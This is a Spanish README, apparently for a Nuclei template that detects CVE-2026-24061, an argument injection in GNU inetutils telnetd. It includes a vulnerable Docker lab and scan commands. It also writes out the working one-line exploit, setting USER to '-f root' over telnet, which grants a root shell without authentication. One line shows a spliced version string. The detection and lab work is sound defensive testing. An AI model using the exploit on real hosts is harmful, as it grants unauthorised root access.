
Plantilla de Nuclei para detectar CVE-2026-24061, una inyección crítica de argumentos telnet en GNU inetutils telnetd que permite acceso root sin autenticación.
Plantilla de Nuclei para la detección de la vulnerabilidad CVE-2026-24061 en GNU inetutils telnetd, que permite obtener acceso root sin autenticación.
CVE-2026-24061 es una vulnerabilidad crítica de inyección de argumentos en GNU inetutils telnetd, que permite a un atacante obtener una shell root sin conocer la contraseña.
%U: /usr/bin/login -p -h %h %?u{-f %u}{%U}
Vulnerabilidad: La variable de entorno USER se transmite a través del protocolo telnet (RFC 1572 NEW-ENVIRON) y no se sanitiza antes de sustituirse en el comando.
Explotación: El atacante establece USER="-f root" al conectarse:
USER="-f root" telnet -a target.com 23
/usr/bin/login -p -h hostname -f root
El flag -f significa "omitir autenticación" → root sin contraseña 💀
inetutils-telnetd 2:2.0-1+deb11u2nuclei -t cve-2026-24061.yaml -u target.com:23 -code
nuclei -t cve-2026-24061.yaml -l targets.txt -code
Para probar, se puede levantar un contenedor Docker vulnerable:
FROM debian:11-slim
ENV DEBIAN_FRONTEND=noninteractive
RUN apt-get update && \
apt-get install -y --no-install-recommends \
inetutils-telnetd=2:2.0-1+deb11u2 \
telnet && \
rm -rf /var/lib/apt/lists/*
RUN useradd user1 && \
sed -i 's/#<off># telnet/telnet/' /etc/inetd.conf
EXPOSE 23
CMD ["/usr/sbin/inetutils-inetd", "-d"]
Ejecución:
# Construir la imagen
docker build -t vuln-telnetd .
# Ejecutar
docker run -d -p 2323:23 vuln-telnetd
# Verificar la vulnerabilidad
nuclei -t cve-2026-24061.yaml -u 127.0.0.1:2323 -code -v
9.8 / 10 - Crítica
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Esta herramienta está diseñada solo para pruebas de seguridad legales en sistemas sobre los que tenga permiso explícito.
El autor no se hace responsable del uso indebido de esta plantilla.
Creado por Mr.Zapi